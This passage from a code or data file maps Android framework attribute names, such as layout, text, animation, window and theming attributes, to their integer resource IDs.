'checkMark' : 16843016,
'foreground' : 16843017,
'measureAllChildren' : 16843018,
'groupIndicator' : 16843019,
'childIndicator' : 16843020,
'indicatorLeft' : 16843021,
'indicatorRight' : 16843022,
'childIndicatorLeft' : 16843023,
'childIndicatorRight' : 16843024,
'childDivider' : 16843025,
'animationDuration' : 16843026,
'spacing' : 16843027,
'horizontalSpacing' : 16843028,
'verticalSpacing' : 16843029,
'stretchMode' : 16843030,
'columnWidth' : 16843031,
'numColumns' : 16843032,
'src' : 16843033,
'antialias' : 16843034,
'filter' : 16843035,
'dither' : 16843036,
'scaleType' : 16843037,
'adjustViewBounds' : 16843038,
'maxWidth' : 16843039,
'maxHeight' : 16843040,
'tint' : 16843041,
'baselineAlignBottom' : 16843042,
'cropToPadding' : 16843043,
'textOn' : 16843044,
'textOff' : 16843045,
'baselineAligned' : 16843046,
'baselineAlignedChildIndex' : 16843047,
'weightSum' : 16843048,
'divider' : 16843049,
'dividerHeight' : 16843050,
'choiceMode' : 16843051,
'itemTextAppearance' : 16843052,
'horizontalDivider' : 16843053,
'verticalDivider' : 16843054,
'headerBackground' : 16843055,
'itemBackground' : 16843056,
'itemIconDisabledAlpha' : 16843057,
'rowHeight' : 16843058,
'maxRows' : 16843059,
'maxItemsPerRow' : 16843060,
'moreIcon' : 16843061,
'max' : 16843062,
'progress' : 16843063,
'secondaryProgress' : 16843064,
'indeterminate' : 16843065,
'indeterminateOnly' : 16843066,
'indeterminateDrawable' : 16843067,
'progressDrawable' : 16843068,
'indeterminateDuration' : 16843069,
'indeterminateBehavior' : 16843070,
'minWidth' : 16843071,
'minHeight' : 16843072,
'interpolator' : 16843073,
'thumb' : 16843074,
'thumbOffset' : 16843075,
'numStars' : 16843076,
'rating' : 16843077,
'stepSize' : 16843078,
'isIndicator' : 16843079,
'checkedButton' : 16843080,
'stretchColumns' : 16843081,
'shrinkColumns' : 16843082,
'collapseColumns' : 16843083,
'layout_column' : 16843084,
'layout_span' : 16843085,
'bufferType' : 16843086,
'text' : 16843087,
'hint' : 16843088,
'textScaleX' : 16843089,
'cursorVisible' : 16843090,
'maxLines' : 16843091,
'lines' : 16843092,
'height' : 16843093,
'minLines' : 16843094,
'maxEms' : 16843095,
'ems' : 16843096,
'width' : 16843097,
'minEms' : 16843098,
'scrollHorizontally' : 16843099,
'password' : 16843100,
'singleLine' : 16843101,
'selectAllOnFocus' : 16843102,
'includeFontPadding' : 16843103,
'maxLength' : 16843104,
'shadowColor' : 16843105,
'shadowDx' : 16843106,
'shadowDy' : 16843107,
'shadowRadius' : 16843108,
'numeric' : 16843109,
'digits' : 16843110,
'phoneNumber' : 16843111,
'inputMethod' : 16843112,
'capitalize' : 16843113,
'autoText' : 16843114,
'editable' : 16843115,
'freezesText' : 16843116,
'drawableTop' : 16843117,
'drawableBottom' : 16843118,
'drawableLeft' : 16843119,
'drawableRight' : 16843120,
'drawablePadding' : 16843121,
'completionHint' : 16843122,
'completionHintView' : 16843123,
'completionThreshold' : 16843124,
'dropDownSelector' : 16843125,
'popupBackground' : 16843126,
'inAnimation' : 16843127,
'outAnimation' : 16843128,
'flipInterval' : 16843129,
'fillViewport' : 16843130,
'prompt' : 16843131,
'startYear' : 16843132,
'endYear' : 16843133,
'mode' : 16843134,
'layout_x' : 16843135,
'layout_y' : 16843136,
'layout_weight' : 16843137,
'layout_toLeftOf' : 16843138,
'layout_toRightOf' : 16843139,
'layout_above' : 16843140,
'layout_below' : 16843141,
'layout_alignBaseline' : 16843142,
'layout_alignLeft' : 16843143,
'layout_alignTop' : 16843144,
'layout_alignRight' : 16843145,
'layout_alignBottom' : 16843146,
'layout_alignParentLeft' : 16843147,
'layout_alignParentTop' : 16843148,
'layout_alignParentRight' : 16843149,
'layout_alignParentBottom' : 16843150,
'layout_centerInParent' : 16843151,
'layout_centerHorizontal' : 16843152,
'layout_centerVertical' : 16843153,
'layout_alignWithParentIfMissing' : 16843154,
'layout_scale' : 16843155,
'visible' : 16843156,
'variablePadding' : 16843157,
'constantSize' : 16843158,
'oneshot' : 16843159,
'duration' : 16843160,
'drawable' : 16843161,
'shape' : 16843162,
'innerRadiusRatio' : 16843163,
'thicknessRatio' : 16843164,
'startColor' : 16843165,
'endColor' : 16843166,
'useLevel' : 16843167,
'angle' : 16843168,
'type' : 16843169,
'centerX' : 16843170,
'centerY' : 16843171,
'gradientRadius' : 16843172,
'color' : 16843173,
'dashWidth' : 16843174,
'dashGap' : 16843175,
'radius' : 16843176,
'topLeftRadius' : 16843177,
'topRightRadius' : 16843178,
'bottomLeftRadius' : 16843179,
'bottomRightRadius' : 16843180,
'left' : 16843181,
'top' : 16843182,
'right' : 16843183,
'bottom' : 16843184,
'minLevel' : 16843185,
'maxLevel' : 16843186,
'fromDegrees' : 16843187,
'toDegrees' : 16843188,
'pivotX' : 16843189,
'pivotY' : 16843190,
'insetLeft' : 16843191,
'insetRight' : 16843192,
'insetTop' : 16843193,
'insetBottom' : 16843194,
'shareInterpolator' : 16843195,
'fillBefore' : 16843196,
'fillAfter' : 16843197,
'startOffset' : 16843198,
'repeatCount' : 16843199,
'repeatMode' : 16843200,
'zAdjustment' : 16843201,
'fromXScale' : 16843202,
'toXScale' : 16843203,
'fromYScale' : 16843204,
'toYScale' : 16843205,
'fromXDelta' : 16843206,
'toXDelta' : 16843207,
'fromYDelta' : 16843208,
'toYDelta' : 16843209,
'fromAlpha' : 16843210,
'toAlpha' : 16843211,
'delay' : 16843212,
'animation' : 16843213,
'animationOrder' : 16843214,
'columnDelay' : 16843215,
'rowDelay' : 16843216,
'direction' : 16843217,
'directionPriority' : 16843218,
'factor' : 16843219,
'cycles' : 16843220,
'searchMode' : 16843221,
'searchSuggestAuthority' : 16843222,
'searchSuggestPath' : 16843223,
'searchSuggestSelection' : 16843224,
'searchSuggestIntentAction' : 16843225,
'searchSuggestIntentData' : 16843226,
'queryActionMsg' : 16843227,
'suggestActionMsg' : 16843228,
'suggestActionMsgColumn' : 16843229,
'menuCategory' : 16843230,
'orderInCategory' : 16843231,
'checkableBehavior' : 16843232,
'title' : 16843233,
'titleCondensed' : 16843234,
'alphabeticShortcut' : 16843235,
'numericShortcut' : 16843236,
'checkable' : 16843237,
'selectable' : 16843238,
'orderingFromXml' : 16843239,
'key' : 16843240,
'summary' : 16843241,
'order' : 16843242,
'widgetLayout' : 16843243,
'dependency' : 16843244,
'defaultValue' : 16843245,
'shouldDisableView' : 16843246,
'summaryOn' : 16843247,
'summaryOff' : 16843248,
'disableDependentsState' : 16843249,
'dialogTitle' : 16843250,
'dialogMessage' : 16843251,
'dialogIcon' : 16843252,
'positiveButtonText' : 16843253,
'negativeButtonText' : 16843254,
'dialogLayout' : 16843255,
'entryValues' : 16843256,
'ringtoneType' : 16843257,
'showDefault' : 16843258,
'showSilent' : 16843259,
'scaleWidth' : 16843260,
'scaleHeight' : 16843261,
'scaleGravity' : 16843262,
'ignoreGravity' : 16843263,
'foregroundGravity' : 16843264,
'tileMode' : 16843265,
'targetActivity' : 16843266,
'alwaysRetainTaskState' : 16843267,
'allowTaskReparenting' : 16843268,
'searchButtonText' : 16843269,
'colorForegroundInverse' : 16843270,
'textAppearanceButton' : 16843271,
'listSeparatorTextViewStyle' : 16843272,
'streamType' : 16843273,
'clipOrientation' : 16843274,
'centerColor' : 16843275,
'minSdkVersion' : 16843276,
'windowFullscreen' : 16843277,
'unselectedAlpha' : 16843278,
'progressBarStyleSmallTitle' : 16843279,
'ratingBarStyleIndicator' : 16843280,
'apiKey' : 16843281,
'textColorTertiary' : 16843282,
'textColorTertiaryInverse' : 16843283,
'listDivider' : 16843284,
'soundEffectsEnabled' : 16843285,
'keepScreenOn' : 16843286,
'lineSpacingExtra' : 16843287,
'lineSpacingMultiplier' : 16843288,
'listChoiceIndicatorSingle' : 16843289,
'listChoiceIndicatorMultiple' : 16843290,
'versionCode' : 16843291,
'versionName' : 16843292,
'marqueeRepeatLimit' : 16843293,
'windowNoDisplay' : 16843294,
'backgroundDimEnabled' : 16843295,
'inputType' : 16843296,
'isDefault' : 16843297,
'windowDisablePreview' : 16843298,
'privateImeOptions' : 16843299,
'editorExtras' : 16843300,
'settingsActivity' : 16843301,
'fastScrollEnabled' : 16843302,
'reqTouchScreen' : 16843303,
'reqKeyboardType' : 16843304,
'reqHardKeyboard' : 16843305,
'reqNavigation' : 16843306,
'windowSoftInputMode' : 16843307,
'imeFullscreenBackground' : 16843308,
'noHistory' : 16843309,
'headerDividersEnabled' : 16843310,
'footerDividersEnabled' : 16843311,
'candidatesTextStyleSpans' : 16843312,
'smoothScrollbar' : 16843313,
'reqFiveWayNav' : 16843314,
'keyBackground' : 16843315,
'keyTextSize' : 16843316,
'labelTextSize' : 16843317,
'keyTextColor' : 16843318,
'keyPreviewLayout' : 16843319,
'keyPreviewOffset' : 16843320,
'keyPreviewHeight' : 16843321,
'verticalCorrection' : 16843322,
'popupLayout' : 16843323,
'state_long_pressable' : 16843324,
'keyWidth' : 16843325,
'keyHeight' : 16843326,
'horizontalGap' : 16843327,
'verticalGap' : 16843328,
'rowEdgeFlags' : 16843329,
'codes' : 16843330,
'popupKeyboard' : 16843331,
'popupCharacters' : 16843332,
'keyEdgeFlags' : 16843333,
'isModifier' : 16843334,
'isSticky' : 16843335,
'isRepeatable' : 16843336,
'iconPreview' : 16843337,
'keyOutputText' : 16843338,
'keyLabel' : 16843339,
'keyIcon' : 16843340,
'keyboardMode' : 16843341,
'isScrollContainer' : 16843342,
'fillEnabled' : 16843343,
'updatePeriodMillis' : 16843344,
'initialLayout' : 16843345,
'voiceSearchMode' : 16843346,
'voiceLanguageModel' : 16843347,
'voicePromptText' : 16843348,
'voiceLanguage' : 16843349,
'voiceMaxResults' : 16843350,
'bottomOffset' : 16843351,
'topOffset' : 16843352,
'allowSingleTap' : 16843353,
'handle' : 16843354,
'content' : 16843355,
'animateOnClick' : 16843356,
'configure' : 16843357,
'hapticFeedbackEnabled' : 16843358,
'innerRadius' : 16843359,
'thickness' : 16843360,
'sharedUserLabel' : 16843361,
'dropDownWidth' : 16843362,
'dropDownAnchor' : 16843363,
'imeOptions' : 16843364,
'imeActionLabel' : 16843365,
'imeActionId' : 16843366,
'imeExtractEnterAnimation' : 16843368,
'imeExtractExitAnimation' : 16843369,
'tension' : 16843370,
'extraTension' : 16843371,
'anyDensity' : 16843372,
'searchSuggestThreshold' : 16843373,
'includeInGlobalSearch' : 16843374,
'onClick' : 16843375,
'targetSdkVersion' : 16843376,
'maxSdkVersion' : 16843377,
'testOnly' : 16843378,
'contentDescription' : 16843379,
'gestureStrokeWidth' : 16843380,
'gestureColor' : 16843381,
'uncertainGestureColor' : 16843382,
'fadeOffset' : 16843383,
'fadeDuration' : 16843384,
'gestureStrokeType' : 16843385,
'gestureStrokeLengthThreshold' : 16843386,
'gestureStrokeSquarenessThreshold' : 16843387,
'gestureStrokeAngleThreshold' : 16843388,
'eventsInterceptionEnabled' : 16843389,
'fadeEnabled' : 16843390,
'backupAgent' : 16843391,
'allowBackup' : 16843392,
'glEsVersion' : 16843393,
'queryAfterZeroResults' : 16843394,
'dropDownHeight' : 16843395,
'smallScreens' : 16843396,
'normalScreens' : 16843397,
'largeScreens' : 16843398,
'progressBarStyleInverse' : 16843399,
'progressBarStyleSmallInverse' : 16843400,
'progressBarStyleLargeInverse' : 16843401,
'searchSettingsDescription' : 16843402,
'textColorPrimaryInverseDisableOnly' : 16843403,
'autoUrlDetect' : 16843404,
'resizeable' : 16843405,
'required' : 16843406,
'accountType' : 16843407,
'contentAuthority' : 16843408,
'userVisible' : 16843409,
'windowShowWallpaper' : 16843410,
'wallpaperOpenEnterAnimation' : 16843411,
'wallpaperOpenExitAnimation' : 16843412,
'wallpaperCloseEnterAnimation' : 16843413,
'wallpaperCloseExitAnimation' : 16843414,
'wallpaperIntraOpenEnterAnimation' : 16843415,
'wallpaperIntraOpenExitAnimation' : 16843416,
'wallpaperIntraCloseEnterAnimation' : 16843417,
'wallpaperIntraCloseExitAnimation' : 16843418,
'supportsUploading' : 16843419,
'killAfterRestore' : 16843420,
'restoreNeedsApplication' : 16843421,
'smallIcon' : 16843422,
'accountPreferences' : 16843423,
'textAppearanceSearchResultSubtitle' : 16843424,
'textAppearanceSearchResultTitle' : 16843425,
'summaryColumn' : 16843426,
'detailColumn' : 16843427,
'detailSocialSummary' : 16843428,
'thumbnail' : 16843429,
'detachWallpaper' : 16843430,
'finishOnCloseSystemDialogs' : 16843431,
'scrollbarFadeDuration' : 16843432,
'scrollbarDefaultDelayBeforeFade' : 16843433,
'fadeScrollbars' : 16843434,
'colorBackgroundCacheHint' : 16843435,
'dropDownHorizontalOffset' : 16843436,
'dropDownVerticalOffset' : 16843437,
'quickContactBadgeStyleWindowSmall' : 16843438,
'quickContactBadgeStyleWindowMedium' : 16843439,
'quickContactBadgeStyleWindowLarge' : 16843440,
'quickContactBadgeStyleSmallWindowSmall' : 16843441,
'quickContactBadgeStyleSmallWindowMedium' : 16843442,
'quickContactBadgeStyleSmallWindowLarge' : 16843443,
'author' : 16843444,
'autoStart' : 16843445,
'expandableListViewWhiteStyle' : 16843446,
'installLocation' : 16843447,
'vmSafeMode' : 16843448,
'webTextViewStyle' : 16843449,
'restoreAnyVersion' : 16843450,
'tabStripLeft' : 16843451,
'tabStripRight' : 16843452,
'tabStripEnabled' : 16843453,
'logo' : 16843454,
'xlargeScreens' : 16843455,
'immersive' : 16843456,
'overScrollMode' : 16843457,
'overScrollHeader' : 16843458,
'overScrollFooter' : 16843459,
'filterTouchesWhenObscured' : 16843460,
'textSelectHandleLeft' : 16843461,
'textSelectHandleRight' : 16843462,
'textSelectHandle' : 16843463,
'textSelectHandleWindowStyle' : 16843464,
'popupAnimationStyle' : 16843465,
'screenSize' : 16843466,
'screenDensity' : 16843467,
'allContactsName' : 16843468,
'windowActionBar' : 16843469,
'actionBarStyle' : 16843470,
'navigationMode' : 16843471,
'displayOptions' : 16843472,
'subtitle' : 16843473,
'customNavigationLayout' : 16843474,
'hardwareAccelerated' : 16843475,
'measureWithLargestChild' : 16843476,
'animateFirstView' : 16843477,
'dropDownSpinnerStyle' : 16843478,
'actionDropDownStyle' : 16843479,
'actionButtonStyle' : 16843480,
'showAsAction' : 16843481,
'previewImage' : 16843482,
'actionModeBackground' : 16843483,
'actionModeCloseDrawable' : 16843484,
'windowActionModeOverlay' : 16843485,
'valueFrom' : 16843486,
'valueTo' : 16843487,
'valueType' : 16843488,
'propertyName' : 16843489,
'ordering' : 16843490,
'fragment' : 16843491,
'windowActionBarOverlay' : 16843492,
'fragmentOpenEnterAnimation' : 16843493,
'fragmentOpenExitAnimation' : 16843494,
'fragmentCloseEnterAnimation' : 16843495,
'fragmentCloseExitAnimation' : 16843496,
'fragmentFadeEnterAnimation' : 16843497,
'fragmentFadeExitAnimation' : 16843498,
'actionBarSize' : 16843499,
'imeSubtypeLocale' : 16843500,
'imeSubtypeMode' : 16843501,
'imeSubtypeExtraValue' : 16843502,
'splitMotionEvents' : 16843503,
'listChoiceBackgroundIndicator' : 16843504,
'spinnerMode' : 16843505,
'animateLayoutChanges' : 16843506,
'actionBarTabStyle' : 16843507,
'actionBarTabBarStyle' : 16843508,
'actionBarTabTextStyle' : 16843509,
'actionOverflowButtonStyle' : 16843510,
'actionModeCloseButtonStyle' : 16843511,
'titleTextStyle' : 16843512,
'subtitleTextStyle' : 16843513,
'iconifiedByDefault' : 16843514,
'actionLayout' : 16843515,
'actionViewClass' : 16843516,
'activatedBackgroundIndicator' : 16843517,
'state_activated' : 16843518,
'listPopupWindowStyle' : 16843519,
'popupMenuStyle' : 16843520,
'textAppearanceLargePopupMenu' : 16843521,
'textAppearanceSmallPopupMenu' : 16843522,
'breadCrumbTitle' : 16843523,
'breadCrumbShortTitle' : 16843524,
'listDividerAlertDialog' : 16843525,
'textColorAlertDialogListItem' : 16843526,
'loopViews' : 16843527,
'dialogTheme' : 16843528,
'alertDialogTheme' : 16843529,
'dividerVertical' : 16843530,
'homeAsUpIndicator' : 16843531,
'enterFadeDuration' : 16843532,
'exitFadeDuration' : 16843533,
'selectableItemBackground' : 16843534,
'autoAdvanceViewId' : 16843535,
'useIntrinsicSizeAsMinimum' : 16843536,
'actionModeCutDrawable' : 16843537,
'actionModeCopyDrawable' : 16843538,
'actionModePasteDrawable' : 16843539,
'textEditPasteWindowLayout' : 16843540,
'textEditNoPasteWindowLayout' : 16843541,
'textIsSelectable' : 16843542,
'windowEnableSplitTouch' : 16843543,
'indeterminateProgressStyle' : 16843544,
'progressBarPadding' : 16843545,
'animationResolution' : 16843546,
'state_accelerated' : 16843547,
'baseline' : 16843548,
'homeLayout' : 16843549,
'opacity' : 16843550,
'alpha' : 16843551,
'transformPivotX' : 16843552,
'transformPivotY' : 16843553,
'translationX' : 16843554,
'translationY' : 16843555,
'scaleX' : 16843556,
'scaleY' : 16843557,
'rotation' : 16843558,
'rotationX' : 16843559,
'rotationY' : 16843560,
'showDividers' : 16843561,
'dividerPadding' : 16843562,
'borderlessButtonStyle' : 16843563,
'dividerHorizontal' : 16843564,
'itemPadding' : 16843565,
'buttonBarStyle' : 16843566,
'buttonBarButtonStyle' : 16843567,
'segmentedButtonStyle' : 16843568,
'staticWallpaperPreview' : 16843569,
'allowParallelSyncs' : 16843570,
'isAlwaysSyncable' : 16843571,
'verticalScrollbarPosition' : 16843572,
'fastScrollAlwaysVisible' : 16843573,
'fastScrollThumbDrawable' : 16843574,
'fastScrollPreviewBackgroundLeft' : 16843575,
'fastScrollPreviewBackgroundRight' : 16843576,
'fastScrollTrackDrawable' : 16843577,
'fastScrollOverlayPosition' : 16843578,
'customTokens' : 16843579,
'nextFocusForward' : 16843580,
'firstDayOfWeek' : 16843581,
'showWeekNumber' : 16843582,
'minDate' : 16843583,
'maxDate' : 16843584,
'shownWeekCount' : 16843585,
'selectedWeekBackgroundColor' : 16843586,
'focusedMonthDateColor' : 16843587,
'unfocusedMonthDateColor' : 16843588,
'weekNumberColor' : 16843589,
'weekSeparatorLineColor' : 16843590,
'selectedDateVerticalBar' : 16843591,
'weekDayTextAppearance' : 16843592,
'dateTextAppearance' : 16843593,
'solidColor' : 16843594,
'spinnersShown' : 16843595,
'calendarViewShown' : 16843596,
'state_multiline' : 16843597,
'detailsElementBackground' : 16843598,
'textColorHighlightInverse' : 16843599,
'textColorLinkInverse' : 16843600,
'editTextColor' : 16843601,
'editTextBackground' : 16843602,
'horizontalScrollViewStyle' : 16843603,
'layerType' : 16843604,
'alertDialogIcon' : 16843605,
'windowMinWidthMajor' : 16843606,
'windowMinWidthMinor' : 16843607,
'queryHint' : 16843608,
'fastScrollTextColor' : 16843609,
'largeHeap' : 16843610,
'windowCloseOnTouchOutside' : 16843611,
'datePickerStyle' : 16843612,
'calendarViewStyle' : 16843613,
'textEditSidePasteWindowLayout' : 16843614,
'textEditSideNoPasteWindowLayout' : 16843615,
'actionMenuTextAppearance' : 16843616,
'actionMenuTextColor' : 16843617,
'textCursorDrawable' : 16843618,
'resizeMode' : 16843619,
'requiresSmallestWidthDp' : 16843620,
'compatibleWidthLimitDp' : 16843621,
'largestWidthLimitDp' : 16843622,
'state_hovered' : 16843623,
'state_drag_can_accept' : 16843624,
'state_drag_hovered' : 16843625,
'stopWithTask' : 16843626,
'switchTextOn' : 16843627,
'switchTextOff' : 16843628,
'switchPreferenceStyle' : 16843629,
'switchTextAppearance' : 16843630,
'track' : 16843631,
'switchMinWidth' : 16843632,
'switchPadding' : 16843633,
'thumbTextPadding' : 16843634,
'textSuggestionsWindowStyle' : 16843635,
'textEditSuggestionItemLayout' : 16843636,
'rowCount' : 16843637,
'rowOrderPreserved' : 16843638,
'columnCount' : 16843639,
'columnOrderPreserved' : 16843640,
'useDefaultMargins' : 16843641,
'alignmentMode' : 16843642,
'layout_row' : 16843643,
'layout_rowSpan' : 16843644,
'layout_columnSpan' : 16843645,
'actionModeSelectAllDrawable' : 16843646,
'isAuxiliary' : 16843647,
'accessibilityEventTypes' : 16843648,
'packageNames' : 16843649,
'accessibilityFeedbackType' : 16843650,
'notificationTimeout' : 16843651,
'accessibilityFlags' : 16843652,
'canRetrieveWindowContent' : 16843653,
'listPreferredItemHeightLarge' : 16843654,
'listPreferredItemHeightSmall' : 16843655,
'actionBarSplitStyle' : 16843656,
'actionProviderClass' : 16843657,
'backgroundStacked' : 16843658,
'backgroundSplit' : 16843659,
'textAllCaps' : 16843660,
'colorPressedHighlight' : 16843661,
'colorLongPressedHighlight' : 16843662,
'colorFocusedHighlight' : 16843663,
'colorActivatedHighlight' : 16843664,
'colorMultiSelectHighlight' : 16843665,
'drawableStart' : 16843666,
'drawableEnd' : 16843667,
'actionModeStyle' : 16843668,
'minResizeWidth' : 16843669,
'minResizeHeight' : 16843670,
'actionBarWidgetTheme' : 16843671,
'uiOptions' : 16843672,
'subtypeLocale' : 16843673,
'subtypeExtraValue' : 16843674,
'actionBarDivider' : 16843675,
'actionBarItemBackground' : 16843676,
'actionModeSplitBackground' : 16843677,
'textAppearanceListItem' : 16843678,
'textAppearanceListItemSmall' : 16843679,
'targetDescriptions' : 16843680,
'directionDescriptions' : 16843681,
'overridesImplicitlyEnabledSubtype' : 16843682,
'listPreferredItemPaddingLeft' : 16843683,
'listPreferredItemPaddingRight' : 16843684,
'requiresFadingEdge' : 16843685,
'publicKey' : 16843686,
'parentActivityName' : 16843687,
'isolatedProcess' : 16843689,
'importantForAccessibility' : 16843690,
'keyboardLayout' : 16843691,
'fontFamily' : 16843692,
'mediaRouteButtonStyle' : 16843693,
'mediaRouteTypes' : 16843694,
'supportsRtl' : 16843695,
'textDirection' : 16843696,
'textAlignment' : 16843697,
'layoutDirection' : 16843698,
'paddingStart' : 16843699,
'paddingEnd' : 16843700,
'layout_marginStart' : 16843701,
'layout_marginEnd' : 16843702,
'layout_toStartOf' : 16843703,
'layout_toEndOf' : 16843704,
'layout_alignStart' : 16843705,
'layout_alignEnd' : 16843706,
'layout_alignParentStart' : 16843707,
'layout_alignParentEnd' : 16843708,
'listPreferredItemPaddingStart' : 16843709,
'listPreferredItemPaddingEnd' : 16843710,
'singleUser' : 16843711,
'presentationTheme' : 16843712,
'subtypeId' : 16843713,
'initialKeyguardLayout' : 16843714,
'widgetCategory' : 16843716,
'permissionGroupFlags' : 16843717,
'labelFor' : 16843718,
'permissionFlags' : 16843719,
'checkedTextViewStyle' : 16843720,
'showOnLockScreen' : 16843721,
'format12Hour' : 16843722,
'format24Hour' : 16843723,
'timeZone' : 16843724,
'mipMap' : 16843725,
'mirrorForRtl' : 16843726,
'windowOverscan' : 16843727,
'requiredForAllUsers' : 16843728,
'indicatorStart' : 16843729,
'indicatorEnd' : 16843730,
'childIndicatorStart' : 16843731,
'childIndicatorEnd' : 16843732,
'restrictedAccountType' : 16843733,
'requiredAccountType' : 16843734,
'canRequestTouchExplorationMode' : 16843735,
'canRequestEnhancedWebAccessibility' : 16843736,
'canRequestFilterKeyEvents' : 16843737,
'layoutMode' : 16843738,
'keySet' : 16843739,
'targetId' : 16843740,
'fromScene' : 16843741,
'toScene' : 16843742,
'transition' : 16843743,
'transitionOrdering' : 16843744,
'fadingMode' : 16843745,
'startDelay' : 16843746,
'ssp' : 16843747,
'sspPrefix' : 16843748,
'sspPattern' : 16843749,
'addPrintersActivity' : 16843750,
'vendor' : 16843751,
'category' : 16843752,
'isAsciiCapable' : 16843753,
'autoMirrored' : 16843754,
'supportsSwitchingToNextInputMethod' : 16843755,
'requireDeviceUnlock' : 16843756,
'apduServiceBanner' : 16843757,
'accessibilityLiveRegion' : 16843758,
'windowTranslucentStatus' : 16843759,
'windowTranslucentNavigation' : 16843760,
'advancedPrintOptionsActivity' : 16843761,
'banner' : 16843762,
'windowSwipeToDismiss' : 16843763,
'isGame' : 16843764,
'allowEmbedded' : 16843765,
'setupActivity' : 16843766,
'fastScrollStyle' : 16843767,
'windowContentTransitions' : 16843768,
'windowContentTransitionManager' : 16843769,
'translationZ' : 16843770,
'tintMode' : 16843771,
'controlX1' : 16843772,
'controlY1' : 16843773,
'controlX2' : 16843774,
'controlY2' : 16843775,
'transitionName' : 16843776,
'transitionGroup' : 16843777,
'viewportWidth' : 16843778,
'viewportHeight' : 16843779,
'fillColor' : 16843780,
'pathData' : 16843781,
'strokeColor' : 16843782,
'strokeWidth' : 16843783,
'trimPathStart' : 16843784,
'trimPathEnd' : 16843785,
'trimPathOffset' : 16843786,
'strokeLineCap' : 16843787,
'strokeLineJoin' : 16843788,
'strokeMiterLimit' : 16843789,
'colorControlNormal' : 16843817,
'colorControlActivated' : 16843818,
'colorButtonNormal' : 16843819,
'colorControlHighlight' : 16843820,
'persistableMode' : 16843821,
'titleTextAppearance' : 16843822,
'subtitleTextAppearance' : 16843823,
'slideEdge' : 16843824,
'actionBarTheme' : 16843825,
'textAppearanceListItemSecondary' : 16843826,
'colorPrimary' : 16843827,
'colorPrimaryDark' : 16843828,
'colorAccent' : 16843829,
'nestedScrollingEnabled' : 16843830,
'windowEnterTransition' : 16843831,
'windowExitTransition' : 16843832,
'windowSharedElementEnterTransition' : 16843833,
'windowSharedElementExitTransition' : 16843834,
'windowAllowReturnTransitionOverlap' : 16843835,
'windowAllowEnterTransitionOverlap' : 16843836,
'sessionService' : 16843837,
'stackViewStyle' : 16843838,
'switchStyle' : 16843839,
'elevation' : 16843840,
'excludeId' : 16843841,
'excludeClass' : 16843842,
'hideOnContentScroll' : 16843843,
'actionOverflowMenuStyle' : 16843844,
'documentLaunchMode' : 16843845,
'maxRecents' : 16843846,
'autoRemoveFromRecents' : 16843847,
'stateListAnimator' : 16843848,
'toId' : 16843849,
'fromId' : 16843850,
'reversible' : 16843851,
'splitTrack' : 16843852,
'targetName' : 16843853,
'excludeName' : 16843854,
'matchOrder' : 16843855,
'windowDrawsSystemBarBackgrounds' : 16843856,
'statusBarColor' : 16843857,
'navigationBarColor' : 16843858,
'contentInsetStart' : 16843859,
'contentInsetEnd' : 16843860,
'contentInsetLeft' : 16843861,
'contentInsetRight' : 16843862,
'paddingMode' : 16843863,
'layout_rowWeight' : 16843864,
'layout_columnWeight' : 16843865,
'translateX' : 16843866,
'translateY' : 16843867,
'selectableItemBackgroundBorderless' : 16843868,
'elegantTextHeight' : 16843869,
'searchKeyphraseId' : 16843870,
'searchKeyphrase' : 16843871,
'searchKeyphraseSupportedLocales' : 16843872,
'windowTransitionBackgroundFadeDuration' : 16843873,
'overlapAnchor' : 16843874,
'progressTint' : 16843875,
'progressTintMode' : 16843876,
'progressBackgroundTint' : 16843877,
'progressBackgroundTintMode' : 16843878,
'secondaryProgressTint' : 16843879,
'secondaryProgressTintMode' : 16843880,
'indeterminateTint' : 16843881,
'indeterminateTintMode' : 16843882,
'backgroundTint' : 16843883,
'backgroundTintMode' : 16843884,
'foregroundTint' : 16843885,
'foregroundTintMode' : 16843886,
'buttonTint' : 16843887,
'buttonTintMode' : 16843888,
'thumbTint' : 16843889,
'thumbTintMode' : 16843890,
'fullBackupOnly' : 16843891,
'propertyXName' : 16843892,
'propertyYName' : 16843893,
'relinquishTaskIdentity' : 16843894,
'tileModeX' : 16843895,
'tileModeY' : 16843896,
'actionModeShareDrawable' : 16843897,
'actionModeFindDrawable' : 16843898,
'actionModeWebSearchDrawable' : 16843899,
'transitionVisibilityMode' : 16843900,
'minimumHorizontalAngle' : 16843901,
'minimumVerticalAngle' : 16843902,
'maximumAngle' : 16843903,
'searchViewStyle' : 16843904,
'closeIcon' : 16843905,
'goIcon' : 16843906,
'searchIcon' : 16843907,
'voiceIcon' : 16843908,
'commitIcon' : 16843909,
'suggestionRowLayout' : 16843910,
'queryBackground' : 16843911,
'submitBackground' : 16843912,
'buttonBarPositiveButtonStyle' : 16843913,
'buttonBarNeutralButtonStyle' : 16843914,
'buttonBarNegativeButtonStyle' : 16843915,
'popupElevation' : 16843916,
'actionBarPopupTheme' : 16843917,
'multiArch' : 16843918,
'touchscreenBlocksFocus' : 16843919,
'windowElevation' : 16843920,
'launchTaskBehindTargetAnimation' : 16843921,
'launchTaskBehindSourceAnimation' : 16843922,
'restrictionType' : 16843923,
'dayOfWeekBackground' : 16843924,
'dayOfWeekTextAppearance' : 16843925,
'headerMonthTextAppearance' : 16843926,
'headerDayOfMonthTextAppearance' : 16843927,
'headerYearTextAppearance' : 16843928,
'yearListItemTextAppearance' : 16843929,
'yearListSelectorColor' : 16843930,
'calendarTextColor' : 16843931,
'recognitionService' : 16843932,
'timePickerStyle' : 16843933,
'timePickerDialogTheme' : 16843934,
'headerTimeTextAppearance' : 16843935,
'headerAmPmTextAppearance' : 16843936,
'numbersTextColor' : 16843937,
'numbersBackgroundColor' : 16843938,
'numbersSelectorColor' : 16843939,
'amPmTextColor' : 16843940,
'amPmBackgroundColor' : 16843941,
'searchKeyphraseRecognitionFlags' : 16843942,
'checkMarkTint' : 16843943,
'checkMarkTintMode' : 16843944,
'popupTheme' : 16843945,
'toolbarStyle' : 16843946,
'windowClipToOutline' : 16843947,
'datePickerDialogTheme' : 16843948,
'showText' : 16843949,
'windowReturnTransition' : 16843950,
'windowReenterTransition' : 16843951,
'windowSharedElementReturnTransition' : 16843952,
'windowSharedElementReenterTransition' : 16843953,
'resumeWhilePausing' : 16843954,
'datePickerMode' : 16843955,
'timePickerMode' : 16843956,
'inset' : 16843957,
'letterSpacing' : 16843958,
'fontFeatureSettings' : 16843959,
'outlineProvider' : 16843960,
'contentAgeHint' : 16843961,
'country' : 16843962,
'windowSharedElementsUseOverlay' : 16843963,
'reparent' : 16843964,
'reparentWithOverlay' : 16843965,
'ambientShadowAlpha' : 16843966,
'spotShadowAlpha' : 16843967,
'navigationIcon' : 16843968,
'navigationContentDescription' : 16843969,
